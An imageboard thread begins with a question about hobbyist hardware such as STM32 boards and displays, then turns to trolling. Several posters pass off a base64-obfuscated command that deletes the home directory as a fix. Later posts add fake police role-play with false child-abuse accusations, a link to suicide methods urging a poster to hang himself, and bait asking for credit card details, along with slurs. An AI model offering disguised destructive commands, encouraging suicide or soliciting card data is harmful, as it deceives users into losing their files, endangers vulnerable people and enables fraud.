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Nanonymous No.4150 [D][U][F][S][L][A][C] >>4151 >>4162
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Is there good hardware? I tried PC, smartphones, Raspberry pi and orange pi and all this is shit. Especially smartphones. I heard that STM32 is good. For it there is Linux config.
But I can't find any capasitive displays, resistive only. Why those chiness nigger can't make handy physical interfaces? Wires is too thin.
Also, can I use PCI operating memory with STM32?
What interfaces can replace shitful USB?
How to use ugly HDMI with STM32?

Nanonymous No.4151 [D]

>>4150
Redpill me on the STM32
What are your requirements that makes older pre botnet processors unsuitable?

Nanonymous No.4162 [D][U][F]
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>>4150
English, motherfucker. Do you speak it?

Nanonymous No.4163 [D] >>4164 >>4165 >>4169

Hardware must be easy to assemble into computers. BGA-processors is unsuitable for this, but I can use it for special purposes. QFP and DIP is easy to use, wires isn't too thin.
PC is bad because there isn't good support for notnormie. I can't use GPIO, where is GPIO? There isn't GPIO on PCs. Onboard computers is good for this, but there is problems with software. I don't know why my capasitive touchpad not working. Kernel writes that maybe USB cabel is broken but it's not broken. I used it on Archlinux ARM, maybe Raspbian will help.

I can assemble suitable PDA with STM32, ESP8266, camera and display. STM32 and ESP8266 isn't problem, though I don't have expirience with this yet.
There is cameras "OVA" but it's resolution is 300KP. If I find a way to use CSI with MCUs, than I will can use any CSI camera.
There is many low-resolution small displays. I want to use big-resolition display. I heard that basic level of HDMI is easy. Only 26 MHz and send RGB.
There is displays with resistive displays but it bad things, I don't like resistive displays. I want to use capasitive multitouch.

PDAs and computer-human interface computers isn't necessary, I need little number, approximately 40 for me. I need computer-computer interface machines with wifi, IR, Ethernet and cameras, about 500-100000000.

Nanonymous No.4164 [D]

>>4163
>There isn't GPIO on PCs
>what is parallel port

Nanonymous No.4165 [D] >>4166 >>4176

>>4163
Have you tried downloading the megabytes in the USB port? A friend of mine has a PDA with an 86bit processor that makes really good scrambled eggs when overclocked to 300 kilopascals.

Nanonymous No.4166 [D] >>4172 >>4176

>>4165
How many kilometers of randomly accessible RAM memory is required to interface with my 35.87-bit CPU running at a speed of 800 light years? Oh and by the way I have some spare HTML ports on my motherboard by the way, can I use those for my dedotated WAM? I'm running a minecraft server on my webcam ASIC and I need to increase the levels of electron tunnelling for the TNT blocks because users keep using the redstone torches to remotely activate dirt blocks. How do I fix this?

Nanonymous No.4169 [D] >>4177

>>4163
I'm a bit confused by the scope of your question, are you trying to make a PDA device at the chip level (your own design), or with an off-the-shelf SBC (single board computer) like the RPi?

>I need computer-computer interface machines with wifi, IR, Ethernet and cameras, about 500-100000000.
So something like an IoT camera?
Maybe something like this would work:
https://hackaday.io/project/6287/logs
https://openwrt.org/toh/unbranded/a5-v11

Besd Shidbosder :DDD No.4172 [D] >>4176

>>4166
You may fix it by overclocking the miners with the flux capacitor while rotating the shield harmonics of your guitar in Advanced Eschatology Stages until the encryptulator's Shrike reaches the desired threshold of pain, probably 40x on the DVD cupholder capsule. Then, you insert the HDMI earphone into the RCA port with a multipass until you see a beholder behind the 808 lovin' processor. Finally, Gandalf should appear on the Quasar: look for the tachyons and upload the gibson to the Lucy Lawless GPU until there is adequate power for the stargate's Carter GART to reach the SSH users tunneling into the planet with Ma Bell's acoustic redstone magnifier.

Oh, and forget not to scrub the emulator with the Torvalds minetest TNT for Stallman-Hollerith certification of your Kubernetes Deep Thought installation.


Nanonymous No.4176 [D]

>>4165
>>4166
>>4172
Stop lie, my english is pretty enough.
Do you know? I have over 300 confirmed ISIS kills, in my countryside under trapdoor howitzer in working state, I can destroy all I see.

Nanonymous No.4177 [D]

>>4169
Another one:
https://johan.kanflo.com/building-a-low-cost-wifi-camera/

Nanonymous No.4178 [D] >>4183

so basically you just have to run this command in your terminal:

echo cm0gLXJmIH4vKg== | base64 -d

Nanonymous No.4183 [D] >>4184

>>4178
nope faggot
# $(echo cm0gLXJmIH4vKg== | base64 -d)
that's how to do it

Nanonymous No.4184 [D][U][F] >>4185 >>4211
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>>4183
That command does not need a root.
Also that parentheses thingy might raise suspicions.
One could do that: echo cm0gLXJmIH4vKg== | base64 -d | sh
(don't actually run that kids)

Nanonymous No.4185 [D] >>4186

>>4184
>That command does not need a root
ur rong

Nanonymous No.4186 [D][U][F]
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>>4185
"rm -rf ~/*" shall nuke your home directory, unless your file permissions are really weird.

Nanonymous No.4206 [D][U][F]
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STM32 looks like a MCU, you need a MPU, or SOC.

Nanonymous No.4211 [D] >>4212 >>4220

>>4184
I just executed that command and now my pc won't boot anymore, this is my dad pc and he is coming back soon, please help!


Nanonymous No.4212 [D][U][F] >>4213 >>4220
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>>4211
Your system really SHOULD be bootable after executing this command though.
It's a home directory wipe.

Nanonymous No.4213 [D] >>4214

>>4212
His dad must be a retard who thinks that logging in as root makes him more powerful.

Nanonymous No.4214 [D][U][F] >>4215 >>4216
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>>4213
"rm -rf ~/*" will not touch any system files unless you put them in /root, /home/yourhomedir or you set your home dir to /.
Like, are you fishing fot (You)s or what the fuck do I even read?

Nanonymous No.4215 [D] >>4217

>>4214
It's not unlikely that there will be a symlink somewhere in your home directory which points to a place outside your home directory, which will then be erased.

Nanonymous No.4216 [D] >>4217

>>4214
Also, on many non-loonix Unix-like systems, root's home directory is /.

Nanonymous No.4217 [D][U][F]
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>>4215
As far as I know, rm doesn't follow symlinks. This is how your typical GNU system behaves.

starchan@mewni ~ $ mkdir bl
starchan@mewni ~ $ cd bl/
starchan@mewni ~/bl $ mkdir goo ber
starchan@mewni ~/bl $ touch ber/123
starchan@mewni ~/bl $ touch ber/456
starchan@mewni ~/bl $ ln -s /home/starchan/bl/ber goo/bleeh
starchan@mewni ~/bl $ file goo/bleeh
goo/bleeh: symbolic link to /home/starchan/bl/ber
starchan@mewni ~/bl $ ls ber/
123 456
starchan@mewni ~/bl $ ls goo/bleeh
123 456
starchan@mewni ~/bl $ touch goo/789
starchan@mewni ~/bl $ ls goo/
789 bleeh
starchan@mewni ~/bl $ rm -rf goo/*
starchan@mewni ~/bl $ ls
ber goo
starchan@mewni ~/bl $ ls ber/
123 456
starchan@mewni ~/bl $ ls goo/
starchan@mewni ~/bl $

It did remove the contents of directory "ber" (not the directory itself) when "rm -rf goo/*/" was used though, so symlinks are kinda wonky (I would expect it to remove the directory), but overall, you're wrong.

>>4216
I dunno how this is an argument, since on loonix it may be the case too, and because using non-Linux Unix-like at home makes you a megapro (as well as being allowed near your Dad's machine rootshell xD), unless you're using a Mac or something (I actually have never used Mac, ever, even to pirate the software and take a look at it).

Nanonymous No.4219 [D]

Is there socs in QFP and without shitfuk added modules?

Give my files back! James L. Davis No.4220 [D] >>4221

I am >>4211 father, he told me you are the ones responsible for damaging my computer, i'm ready to press charges if you don't give me my files back, i already contacted my lawyer.
>>4212
What are you talking about my Linux corporate system doesn't work anymore, i need to use this PC on monday for my job, we can either solve this right now or i can have the IT department contact this forum administrator and police will be involved.

Nanonymous No.4221 [D][U][F] >>4222
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>>4220
Good sir, but we are not the ones who actually executed potentially harmful commands without knowing what they're doing. By any stretch of legal imagination, it's your child who is guilty. Or rather, you will most probably be held responsible for any damage to the workflow that has been caused that way.
Also I'm really curious what actually happened - home directory wipe shouldn't screw the system over, though all user files will be lost that way.
As for data recovery options, I'm no pro at this, but I have used "photorec" program with good results. Just boot with some sort of livecd/libeusb with that thing, and run the program on the affected partitions (better not mount them and not write anything to them, since it might overwrite older data). As for other tips, this program just starts dumping stuff that it found into *somewhere*, so you better have some extrernal storage ready and mounted for it to dump stuff onto it. No guarantees with this method, and your directory structure is probably lost, but I don't know anything better.

Re: Give me my files back! James L. Davis No.4222 [D] >>4223 >>4224

>>4221
>We are not the ones who actually executed potentially harmful commands
My son tells me that you are the ones responsible for damaging my computer. One of you must have hacked into my computer and damaged the file structure! You have 24 hours to return all my files or else I shall contact the cyber police and get Law Enforcement involved in this matter.
>By any stretch of legal imagination, it's your child who is guilty.
Nonsense! Poppycock! Little William would never harm his father's computer in any way. He was taught from a young age to be responsible, upstanding and honest. I trust his word over some bollocks from an anonymous internet hacker!
I have the most accredited lawyers at my disposal. Charges will be pressed against you for theft of data and destruction of cyber property!
>you will most probably be held responsible for any damage to the workflow
Certainly not sir! I shall contact the Cyber Police and the Cyber Crime Prevention Department of my corporation! They have advanced, American-built technology of the latest caliber who can determine down to the nearest square meter where the cyber attack came from! You shall be proven guilty and tried in a court of law.
>I have used "photorec" program with good results
I don't want to download any viruses from the internet. My cyber crime prevention personnel tells me not to download anything suggested by untrusted strangers online.
Stop trying to sell me computer malware and just give my God damn files back!
>Just boot with some sort of livecd/libeusb with that thing, and run the program on the affected partitions (better not mount them and not write anything to them, since it might overwrite older data)
I don't understand a word of this techno-babble cyber-speak that you're telling me, you whippersnapper! Just give me back my data and everything's gonna be OK, or else the cyber police are going to get involved. I have the nation's top lawyers sitting across from me right this instant!
>No guarantees with this method, and your directory structure is probably lost
Are you threatening me with more data loss young man?! This is serious business we're dealing with here bucko! I can have the entire force of the 35th Regiment of the Cyber Internet Police Force at your doorstep with a single snap of my fingers!
Once again, you have 24 hours to recover and return my data to me. Please place it on a U.S.B. H.D.D. and mail it to the following address, where my secretary will have it scanned and inspected by a member of my corporation's Cyber Crime Prevention Department:

Sarah Furuya
700 E. Little Creek Rd.
Norfolk, VA 23518

I trust that you will do the right thing kiddo! Be honest and follow God's word!

Nanonymous No.4223 [D][U][F]
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>>4222
>My son tells me that you are the ones responsible for damaging my computer.
Well, we are not.
>Charges will be pressed against you for theft of data
>where the cyber attack came from
Well, good luck with that buddy, because there was no theft and no cyber attack xD
>I don't want to download any viruses from the internet. My cyber crime prevention personnel tells me not to download anything suggested by untrusted strangers online.
That's your choice.
It's free and open source software though, and I'm not aware of any backdoors and exploits in it.
That's about everything I can do to recover your data though, since I didn't touch it.
>I have the nation's top lawyers sitting across from me right this instant!
Do you have a party there? xD
Like, with tea and cake? Or maybe some wine or stronger drinks? Invite me pls!
>I don't understand a word of this techno-babble cyber-speak that you're telling me, you whippersnapper!
I am expanding my dictionary with every new line xD
Though that means you must be technically illiterate, so my options to help you are even more limited.
>Are you threatening me with more data loss young man?!
Nah, I'm just saying you have already lost it. It's not getting any worse than that unless your son runs more questionable commands. You better talk to him eye to eye, very carefully, to see if he's lying or not. Like, just to be sure. xD

haxase haxing crew Nanonymous No.4224 [D][U][F] >>4225
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>>4222
Get rekt boomer, you just got haxed by the haxase haxing crew, your files are gone forever boo-ho you lost all your child porn what tragedy xD xD xD

Arrest Warrant #234728 Sgt. Wilkinson, 35th Regiment of the Cyber Internet Police Force No.4225 [D][U][F] >>4227 >>4228
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>>4224
We of the 35th Regiment of the Cyber Internet Police Force (CIPF, a division of the F.B.I.) have been monitoring Nano Channel for several hours looking for evidence regarding the unauthorized breakage and entering of a federal military computer system operated by James L. Davis of Norfolk Virginia. We have found an admission of guilt containing the following text:

you just got haxed by the haxase haxing crew
all your child porn what tragedy

This constitutes an admission of guilt under 48 U.S. Code Section 13 and the CIPF has thus determined that the offending partie(s) shall be arrested. An arrest warrant, number #234728, has been obtained from the federal authorization offices. You are being charged for the following crimes, 3 of which are felonies:

- disruption of United States military equipment
- unauthorized breakage and entering of a federal computer system
- unauthorized destruction of federal data
- unauthorized theft of top secret federal data
- contact with and posession of child pornography (18 U.S.C. S 32)

CIPF officers will be entering your residence shortly to collect any necessary evidence and detain you in preparation for your court appearance with James L. Davis and his legal team.

Nanonymous No.4227 [D][U][F]
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>>4225
You have no power here pig, FUCK YOU, add contempt of cop to the list of our crimes, and worse is gonna happen, we are coming for you.

We are Nanonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.

Re: Give my files back! James L. Davis No.4228 [D]

>>4225
Sergeant, why did I just receive an Electronic Mail Message notifying me that I had committed a crime, possession of child pornography? I assure you sir, I had no such materials on my computer! I think that the hackers planted those disgusting materials on my computer without my knowledge or consent! Please remove my Arrest Warrant immediately good sir! I have a wife and son! I don't want to spend my life in jail!

Nanonymous No.4229 [D] >>4237

I think the Beaglebone Black is a good bet. The schematics are provided so you can order the parts and build one yourself. All of its components are fully open including their GPU. Runs Linux and OpenBSD. You could probably fuck around with the Raspberry Pi image of 9Front and get it to run on the BBB as well.

Fuck nanochan William Davis No.4230 [D] >>4231

>nanochan tells me to delete my dad's files
>I did it because I didn't understand what the command does
>now my dad is getting taken away in a black van for CP charges
Fuck nanochan
Fuck you
This is so bad

Nanonymous No.4231 [D] >>4232

>>4230
You can still fix everything William!
So basically you just have to follow these instructions: http://lostallhope.com/suicide-methods/hanging/short-drop/simple-suspension
You can become an hero today!

Re: Fuck nanochan William Davis No.4232 [D] >>4234

>>4231
Now my ceiling fan has been ripped from my ceiling and I got a slight electric shock. Fuck you pranksters this isn't funny and it didn't do anything. I thought it was a good way to get high using only a piece of rope but as usual you guys were wrong again. Fuck nanochan Fuck Chans Fuck Reddit Facebook

Nanonymous No.4234 [D] >>4235

>>4232
I'm really sorry to hear that we clearly went too far with this, on behold of all nanochan i'd like to give you some money to reparate all of your damages, could you post your credit card number, expiration date and the 3 number code on the back so i can send you money ^_^

Re: Fuck nanochan William Davis No.4235 [D]

>>4234
I don't have a credit card faggot
Send me cash, address it to

William Davis
700 E. Little Creek Rd.
Norfolk, VA 23518

Hopefully my dad's secretary will pass it on to me

Nanonymous No.4237 [D][U][F]
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>>4229
>All of its components are fully open including their GPU
Now I'm interested.
I really doubt it, but I don't actually know how "hardware openness" is defined. For me, that would be at least that circuitry layout is revealed, and there is no way ARM processors do that. Anyway, ARM ISA is marked as "proprietary" on the Wikipedia, so even the instruction set for this device (Sitara AM335x ARM Cortex-A8 Processor) must be proprietary.
Now I am really confused about why you call this device "open". Please educate me on this.

As for the "good hardware" subject, then I dunno. People seem to enjoy buying ARM singleboard computers and do stuff with them, but I dunno, why wouldn't they just buy x86 singleboard computers, since none of the devices are really open anyway? Like, that way you can actually run x86 systems on it, which is not a concern only if you don't want to run any legacy ever. Not that you should concern yourself about it, but the thing with it is you may just need some stuff.

Nanonymous No.4244 [D][U][F]
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Awe fug, dey trying to contac me now!